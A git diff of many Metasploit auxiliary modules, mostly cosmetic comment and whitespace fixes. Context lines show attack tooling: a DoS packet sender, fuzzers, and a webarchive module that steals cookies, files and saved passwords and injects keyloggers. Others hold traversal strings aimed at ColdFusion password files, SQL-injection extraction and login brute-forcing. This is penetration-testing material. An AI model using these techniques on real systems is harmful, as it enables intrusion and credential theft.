connect_udp(global = true,'RPORT' => port)
print_status("Sending DoS packet to #{rhost}:#{port}...")
udp_sock.put("Kthxbai")
disconnect_udp
#Check is target is down
# Check is target is down
connect_udp
print_status("Checking target...")
udp_sock.put("HELLO0.83\0")

View File

@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
pkt['Payload'].v['DataOffset'] = doffset #<====
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
pkt['Payload'].v['ByteCount'] = fillersize#<====
pkt['Payload'].v['ByteCount'] = fillersize #<====
pkt['Payload'].v['Payload'] = filler
simple.client.smb_send(pkt.to_s)

View File

@ -40,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
delimiter = "\x00"*3
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e].pack("C*")
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e].pack("C*")
packet << Rex::Text.rand_text_alphanumeric(126)
packet << delimiter
packet << Rex::Text.rand_text_alphanumeric(16)

View File

@ -47,26 +47,18 @@ class Metasploit3 < Msf::Auxiliary
def support_ipv6?
false
end
#---------------------------------------------------------------------------------
def setup
super
@state = {}
end
#---------------------------------------------------------------------------------
def run
@fuzzsize=datastore['STARTSIZE'].to_i
exploit()
end
#---------------------------------------------------------------------------------
# Handler for new FTP client connections
#---------------------------------------------------------------------------------
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
@ -75,20 +67,18 @@ class Metasploit3 < Msf::Auxiliary
:user => nil,
:pass => nil
}
#set up an active data port on port 20
# set up an active data port on port 20
print_status("Client connected : " + c.peerhost)
active_data_port_for_client(c, 20)
send_response(c,"","WELCOME",220," "+datastore['WELCOME'])
#from this point forward, on_client_data() will take over
# from this point forward, on_client_data() will take over
end
def on_client_close(c)
@state.delete(c)
end
#---------------------------------------------------------------------------------
# Active and Passive data connections
#---------------------------------------------------------------------------------
def passive_data_port_for_client(c)
@state[c][:mode] = :passive
if(not @state[c][:passive_sock])
@ -140,22 +130,17 @@ class Metasploit3 < Msf::Auxiliary
nil
end
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
def on_client_data(c)
#get the client data
# get the client data
data = c.get_once
return if not data
#split data into command and arguments
# split data into command and arguments
cmd,arg = data.strip.split(/\s+/, 2)
arg ||= ""
return if not cmd
#convert commands to uppercase and strip spaces
# convert commands to uppercase and strip spaces
case cmd.upcase.strip
when 'USER'
@ -247,7 +232,7 @@ class Metasploit3 < Msf::Auxiliary
return
when /^(LIST|NLST|LS)$/
#special case - requires active/passive connection
# special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
@ -289,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary
return
when 'RETR'
#special case - requires active/passive connection
# special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
@ -353,11 +338,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#---------------------------------------------------------------------------------
# Fuzzer functions
#---------------------------------------------------------------------------------
# Do we need to fuzz this command ?
def fuzz_this_cmd(cmd)
@ -421,7 +402,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("* Fuzz data sent")
incr_fuzzsize()
else
#Do not fuzz
# Do not fuzz
cmsg = code.to_s + msg
cmsg = cmsg.strip
c.put("#{cmsg}\r\n")

View File

@ -175,14 +175,14 @@ class Metasploit3 < Msf::Auxiliary
else
datastr = "\r\n"
end
#first, check the original header fields and add some others - just for fun
# first, check the original header fields and add some others - just for fun
myheaders = @send_data[:headers]
mysendheaders = @send_data[:headers].dup
#get or post ?
# get or post ?
mysendheaders[:method] = form[:method].upcase
myheaders.each do | thisheader |
if not headers[thisheader[0]]
#add header if needed
# add header if needed
mysendheaders[thisheader[0]]= thisheader[1]
end
end
@ -300,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary
def get_field_val(input)
tmp = input.split(/\=/)
#get delimeter
# get delimeter
tmp2 = tmp[1].strip
delim = tmp2[0,1]
if delim != "'" && delim != '"'
@ -316,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary
body = body.gsub("\r","")
body = body.gsub("\n","")
bodydata = body.downcase.split(/<form/)
#we need part after <form
# we need part after <form
totalforms = bodydata.size - 1
print_status(" Number of forms : #{totalforms}")
formcnt = 0
@ -326,7 +326,7 @@ class Metasploit3 < Msf::Auxiliary
fdata = bodydata[formidx]
print_status(" - Enumerating form ##{formcnt+1}")
data = fdata.downcase.split(/<\/form>/)
#first, get action and name
# first, get action and name
formdata = data[0].downcase.split(/>/)
subdata = formdata[0].downcase.split(/ /)
namefound = false
@ -375,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary
namefound = true
formfields = []
#input boxes
# input boxes
fieldtypemarks = [ '<input', '<select' ]
fieldtypemarks.each do | currfieldmark |
formfieldcnt=0
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
if subdata.size > 1
subdata.each do | thisinput |
if skipflag == 1
#first, find the delimeter
# first, find the delimeter
fielddata = thisinput.downcase.split(/>/)
fields = fielddata[0].split(/ /)
fieldname = ""
@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary
fieldid = get_field_val(thisfield)
end
if thisfield.match(/^value=/)
#special case
# special case
location = fielddata[0].index(thisfield)
delta = fielddata[0].size - location
remaining = fielddata[0][location,delta]
@ -518,13 +518,13 @@ class Metasploit3 < Msf::Auxiliary
formfound = response.body.downcase.index("<form")
if formfound
formdata = get_form_data(response.body)
#fuzz !
#for each form that needs to be fuzzed
# fuzz !
# for each form that needs to be fuzzed
formdata.each do | thisform |
if thisform[:name].length > 0
if ((datastore['FORM'].strip == "") || (datastore['FORM'].upcase.strip == thisform[:name].upcase.strip)) && (thisform[:fields].size > 0)
print_status("Fuzzing fields in form #{thisform[:name].upcase.strip}")
#for each field in this form, fuzz one field at a time
# for each field in this form, fuzz one field at a time
formfields = thisform[:fields]
formfields.each do | thisfield |
if thisfield[:name]
@ -537,7 +537,7 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
end
#fuzz headers ?
# fuzz headers ?
if datastore['FUZZHEADERS'] == true
print_status("Fuzzing header fields")
do_fuzz_headers(thisform,response.headers)

View File

@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Exception => e
last_err = e
#ensure
# disconnect
#disconnect
end

View File

@ -282,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] the XML markup to insert into the webarchive for each unique
# iframe (we use one frame per site we want to steal)
# iframe (we use one frame per site we want to steal)
# @return '' if msf user does not want to poison cache
def webarchive_resources_for_poisoning_cache(url)
if not should_install_keyloggers? then return '' end
@ -320,14 +320,14 @@ class Metasploit3 < Msf::Auxiliary
|
end
# @param [script] hash containing HTTP headers from the request
# @param script [Hash] containing HTTP headers from the request
# @return [String] xml markup for serialized WebResourceResponse containing good
# stuff like HTTP/caching headers. Safari appears to do the following:
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
# stuff like HTTP/caching headers. Safari appears to do the following:
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
def web_response_xml(script)
# this is a serialized NSHTTPResponse, i'm too lazy to write a
# real encoder so yay lets use string interpolation.
# real encoder so yay lets use string interpolation.
# ripped this straight out of a webarchive save
script['content-length'] = script[:body].length
whitelist = %w(content-type content-length date etag
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] mark up for embedding the iframes for each URL in a place that is
# invisible to the user
# invisible to the user
def iframes_container_html
hidden_style = "position:fixed; left:-600px; top:-600px;"
wrap_with_doc do
@ -517,8 +517,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in script tags, that is inserted into the
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
def communication_js
wrap_with_script do
%Q|
@ -543,7 +543,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals the cookies
# and response body/headers, and passes them back up to the parent.
# and response body/headers, and passes them back up to the parent.
def steal_cookies_for_url(url)
wrap_with_script do
%Q|
@ -568,8 +568,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals local files
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
def steal_files
return '' unless should_steal_files?
urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ')
@ -595,9 +595,9 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals autosaved form
# usernames and passwords. The attack first tries to render the target URL in an iframe,
# and steal populated passwords from there. If the site disables iframes through the
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
# usernames and passwords. The attack first tries to render the target URL in an iframe,
# and steal populated passwords from there. If the site disables iframes through the
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
def steal_form_data_for_url(url)
wrap_with_script do
%Q|
@ -663,8 +663,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in script tag, that adds a helper function
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
def injected_js_helpers
wrap_with_script do
%Q|
@ -678,7 +678,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] HTML markup that includes a script at the URL we want to poison
# We will then install the injected_js_keylogger at the same URL
# We will then install the injected_js_keylogger at the same URL
def trigger_cache_poison_for_url(url)
url_idx = urls.index(url)
scripts_to_poison[url_idx].map { |s|
@ -686,10 +686,10 @@ class Metasploit3 < Msf::Auxiliary
}.join
end
# @param [String] original_js the original contents of the script file
# @param original_js [String] the original contents of the script file
# @return [String] the poisoned contents. Once the module has found a valid 304'd script to
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
# appropriate Cache-Control to the webarchive.
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
# appropriate Cache-Control to the webarchive.
# @return [String] the original contents if msf user does not want to install keyloggers
def inject_js_keylogger(original_js)
if not should_install_keyloggers?
@ -726,7 +726,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [Array<Array<String>>] list of URLs provided by the user mapped to all of the linked
# javascript assets in its HTML response.
# javascript assets in its HTML response.
def all_script_urls(pages)
pages.map do |url|
results = []
@ -829,7 +829,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
# via the FILE_URLS module option.
# via the FILE_URLS module option.
def interesting_file_urls
[
'file:///var/log/weekly.out', # may contain usernames
@ -849,7 +849,7 @@ class Metasploit3 < Msf::Auxiliary
(datastore['URLS'] || '').split(/\s+/)
end
# @param [String] input the unencoded string
# @param input [String] the unencoded string
# @return [String] input with dangerous chars replaced with xml entities
def escape_xml(input)
input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")

View File

@ -158,14 +158,14 @@ class Metasploit3 < Msf::Auxiliary
filename = ""
url = '/CFIDE/administrator/index.cfm'
# print_status("Getting index...")
# print_status("Getting index...")
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
# print_status("Got back: #{res.inspect}")
# print_status("Got back: #{res.inspect}")
return if not res
return if not res.body or not res.code
return if not res.code.to_i == 200

View File

@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
def srvqry(dom)
results = []
#Most common SRV Records
# Most common SRV Records
srvrcd = [
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',

View File

@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
#---------------------------------------------------------------------------------
def switchdns(target)
if not datastore['NS'].nil?
print_status("Using DNS Server: #{datastore['NS']}")
@ -71,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#---------------------------------------------------------------------------------
def wildcard(target)
rendsub = rand(10000).to_s
query = @res.query("#{rendsub}.#{target}", "A")
@ -85,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
return false
end
end
#---------------------------------------------------------------------------------
def genrcd(target)
print_status("Retrieving general DNS records")
query = @res.search(target)
@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#---------------------------------------------------------------------------------
def tldexpnd(targetdom,nssrv)
target = targetdom.scan(/(\S*)[.]\w*\z/).join
target.chomp!
@ -178,13 +177,13 @@ class Metasploit3 < Msf::Auxiliary
i, a = 0, []
tlds = [
"com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz",
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac","au",
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac", "au",
"at", "az", "bs", "bh", "bd", "bb", "by", "be", "bz", "bj", "bm",
"bt", "bo", "ba", "bw", "bv", "br", "io", "bn", "bg", "bf", "bi",
"kh", "cm", "ca", "cv", "ky", "cf", "td", "cl", "cn", "cx", "cc",
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
"dk", "dj", "dm", "do", "tp", "ec", "eg", "sv", "gq", "er", "ee",
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
"ge", "de", "gh", "gi", "gr", "gl", "gd", "gp", "gu", "gt", "gg",
"gn", "gw", "gy", "ht", "hm", "va", "hn", "hk", "hu", "is", "in",
"id", "ir", "iq", "ie", "im", "il", "it", "jm", "jp", "je", "jo",
@ -221,7 +220,6 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------------------------------
def dnsbrute(target, wordlist, nssrv)
print_status("Running bruteforce against domain #{target}")
arr = []
@ -250,7 +248,6 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------------------------------
def bruteipv6(target, wordlist, nssrv)
print_status("Bruteforcing IPv6 addresses against domain #{target}")
arr = []
@ -283,7 +280,6 @@ class Metasploit3 < Msf::Auxiliary
#-------------------------------------------------------------------------------
def reverselkp(iprange,nssrv)
print_status("Running reverse lookup against IP range #{iprange}")
if not nssrv.nil?
@ -327,12 +323,12 @@ class Metasploit3 < Msf::Auxiliary
tl.delete_if { |t| not t.alive? }
end
end
#-------------------------------------------------------------------------------
#SRV Record Enumeration
# SRV Record Enumeration
def srvqry(dom,nssrv)
print_status("Enumerating SRV records for #{dom}")
i, a = 0, []
#Most common SRV Records
# Most common SRV Records
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
@ -354,8 +350,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------------------------------
#For Performing Zone Transfers
# For Performing Zone Transfers
def axfr(target, nssrv)
print_status("Performing zone transfer against all nameservers in #{target}")
if not nssrv.nil?
@ -387,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
:type => 'dns.enum',
:update => :unique_data,
:data => "Zone transfer successful")
#Prints each record according to its type
# Prints each record according to its type
zone.each do |response|
response.answer.each do |rr|
begin
@ -475,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{rr.host},#{rr.port},#{rr.priority},SRV")
end
rescue ActiveRecord::RecordInvalid
#Do nothing. Probably tried to store :host => 127.0.0.1
# Do nothing. Probably tried to store :host => 127.0.0.1
end
end
end

View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # msf module
'joev' # metasploit module
],
'References' =>
[

View File

@ -84,10 +84,10 @@ class Metasploit4 < Msf::Auxiliary
fail_with("Error in server response")
end
#qgjuq is prepended to the result of the sql injection
#qirpq is appended to the result of the sql injection
#This allows the use of a simple regex to grab the contents
#of the file easily from the page source.
# qgjuq is prepended to the result of the sql injection
# qirpq is appended to the result of the sql injection
# This allows the use of a simple regex to grab the contents
# of the file easily from the page source.
file = /qgjuq(.*)qirpq/.match(resp.body)
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')

View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
return Exploit::CheckCode::Unknown
end
#Check PhP
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
php_version = "PHP version unknown"
end
#Check Web-Server
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
web_server = "unknown web server"
end
#Check forum MyBB
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Resolve response
# Resolve response
if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
print_good("#{peer} - Running PostgreSQL Database")
elsif response.body.match(/General error\: 1 no such function\: REGEXP/)

View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
#Search google.com for email's of target domain
# Search google.com for email's of target domain
def search_google(targetdom)
print_status("Searching Google for email addresses from #{targetdom}")
response = ""
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#Search Yahoo.com for email's of target domain
# Search Yahoo.com for email's of target domain
def search_yahoo(targetdom)
print_status("Searching Yahoo for email addresses from #{targetdom}")
response = ""
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#Search Bing.com for email's of target domain
# Search Bing.com for email's of target domain
def search_bing(targetdom)
print_status("Searching Bing email addresses from #{targetdom}")
response = ""
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#for writing file with all email's found
# for writing file with all email's found
def write_output(data)
print_status("Writing email address list to #{datastore['OUTFILE']}...")
::File.open(datastore['OUTFILE'], "ab") do |fd|

View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Trigger firmware bootstrap write out password data to URL root
# Trigger firmware bootstrap write out password data to URL root
def write
print_status("#{rhost}:#{jport} - Sending print job")
create_print_job = '%%XRXbegin' + "\x0a"

View File

@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
[ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],

View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
'License' => MSF_LICENSE

View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(trojan_command(:nop))
print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
## Add Vulnerability and Report
# Add Vulnerability and Report
report_vuln({
:host => ip,
:name => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",

View File

@ -31,9 +31,7 @@ class Metasploit3 < Msf::Auxiliary
begin
connect_udp
udp_sock.put(pkt)
res = udp_sock.read(1024).split(/\x00/)
if (res)

View File

@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
#reportdata << "name: #{princ.unpack("H*")[0]}"
end
## Add Report
# Add Report
report_note(
:host => ip,
:proto => 'tcp',

View File

@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
# Start caputure
# Start capture
open_pcap({'FILTER' => "icmp6"})
@netifaces = true

View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'xistence' #Vulnerability discovery and Metasploit module
'xistence' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Jan 28 2014"

View File

@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary
end
#URL's that may work for you:
# URLs that may work for you:
#"/CFIDE/administrator/enter.cfm",
#"/CFIDE/wizards/common/_logintowizard.cfm",
#"/CFIDE/administrator/archives/index.cfm",
@ -206,7 +206,7 @@ end
#"/CFIDE/administrator/entman/index.cfm",
#"/CFIDE/administrator/logging/settings.cfm",
#Files to grab
# Files to grab
#../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#../../../../../../../../../../CFusionMX7/lib/password.properties%00en
#../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en

View File

@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary
# print table
print_line(membertbl.to_s)
#store username to loot
# store username to loot
report_note({
:host => rhost,
:port => rport,

View File

@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'hdm', #http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
'hdm', # http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
],
'References' =>
[
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
}
end
#default to user=admin without password (default on most dlink routers)
# default to user=admin without password (default on most dlink routers)
def do_login(user='admin', pass='')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")

View File

@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
devices. It is possible that this module also works with other models.
},
'Author' => [
'hdm', #http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
'hdm', #http_login module
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
],
'References' =>
[
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
end
def is_dlink?
#the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
#input to detect this device. Not sure if this works on other devices! Tested on v8.04.
# the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
# input to detect this device. Not sure if this works on other devices! Tested on v8.04.
begin
response = send_request_cgi({
'uri' => '/gconfig.htm',
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
return false if response.nil?
return false if (response.code == 404)
#fingerprinting tested on firmware version 8.04
# fingerprinting tested on firmware version 8.04
if response.body !~ /var\ systemName\=\'DLINK\-DIR615/
return false
else
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#default to user=admin without password (default on most dlink routers)
# default to user=admin without password (default on most dlink routers)
def do_login(user='admin', pass='')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")

View File

@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
}
end
#default to user=admin without password (default on most dlink routers)
# default to user=admin without password (default on most dlink routers)
def do_login(user='admin', pass='')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")

View File

@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
])
], self.class)
# "Set to false to prevent account lockouts - it will!"
# Set to false to prevent account lockouts - it will!
deregister_options('BLANK_PASSWORDS')
end
def target_url
#Function to display correct protocol and host/vhost info
# Function to display correct protocol and host/vhost info
if rport == 443 or ssl
proto = "https"
else
@ -74,8 +74,8 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Check for HTTP 200 response.
#Numerous versions and configs make if difficult to further fingerprint.
# Check for HTTP 200 response.
# Numerous versions and configs make if difficult to further fingerprint.
if (res and res.code == 200)
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
@ -110,8 +110,8 @@ class Metasploit3 < Msf::Auxiliary
end
def get_version
#Attempt to retrieve the version of CMS400.NET installed.
#Not always possible based on version/config.
# Attempt to retrieve the version of CMS400.NET installed.
# Not always possible based on version/config.
payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
res = send_request_cgi(
{

View File

@ -158,7 +158,6 @@ class Metasploit3 < Msf::Auxiliary
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400

View File

@ -128,17 +128,17 @@ class Metasploit4 < Msf::Auxiliary
case action.name
when 'PUT'
#Append filename if there isn't one
# Append filename if there isn't one
if path !~ /(.+\.\w+)$/
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
vprint_status("No filename specified. Using: #{path}")
end
#Upload file
# Upload file
res = do_put(path, data)
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
#Check file
# Check file
if not res.nil? and file_exists(path, data)
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
print_good("File uploaded: #{turl}")
@ -156,7 +156,7 @@ class Metasploit4 < Msf::Auxiliary
end
when 'DELETE'
#Check file before deleting
# Check file before deleting
if path !~ /(.+\.\w+)$/
print_error("You must supply a filename")
return
@ -165,11 +165,11 @@ class Metasploit4 < Msf::Auxiliary
return
end
#Delete our file
# Delete our file
res = do_delete(path)
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
#Check if DELETE was successful
# Check if DELETE was successful
if res.nil? or file_exists(path, data)
print_error("DELETE failed. File is still there.")
else

View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
}
})
#without res.body.length we get lots of false positives
# without res.body.length we get lots of false positives
if (res and res.code == 200 and res.body.length > 0)
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
report_web_vuln({
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
#test login
# test login
begin
res = send_request_cgi({
'uri' => '/',

View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>' # msf
'Brendan Coles <bcoles[at]gmail.com>' # metasploit module
],
'References' =>
[

View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'blkhtc0rp', #Original
'sinn3r'
'blkhtc0rp', #Original
'sinn3r' #Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Oct 19 2012"

View File

@ -34,9 +34,9 @@ class Metasploit4 < Msf::Auxiliary
],
'Author' =>
[
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
],
'License' => MSF_LICENSE
)

View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
tpath += '/'
end
#load the file with filenames into memory
# load the file with filenames into memory
queue = []
File.open(datastore['FILEPATH'], 'rb').each_line do |fn|
queue << fn.strip

View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
return save_array
end
#traversal every file
# traverse every file
def find_files(file,user,pass)
traversal = '/../../'
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
#test login
# test login
begin
res = send_request_cgi({
'uri' => '/',

View File

@ -186,8 +186,8 @@ class Metasploit3 < Msf::Auxiliary
return :abort
end
if action.name == "OWA_2013"
#Check for a response code to make sure login was valid. Changes from 2010 to 2013.
#Check if the password needs to be changed.
# Check for a response code to make sure login was valid. Changes from 2010 to 2013.
# Check if the password needs to be changed.
if res.headers['location'] =~ /expiredpassword/
print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}': NOTE password change required")
report_hash = {
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary
return :next_user
end
#No password change required moving on.
# No password change required moving on.
unless location = res.headers['location']
print_error("#{msg} No HTTP redirect. This is not OWA 2013, aborting.")
return :abort
@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary
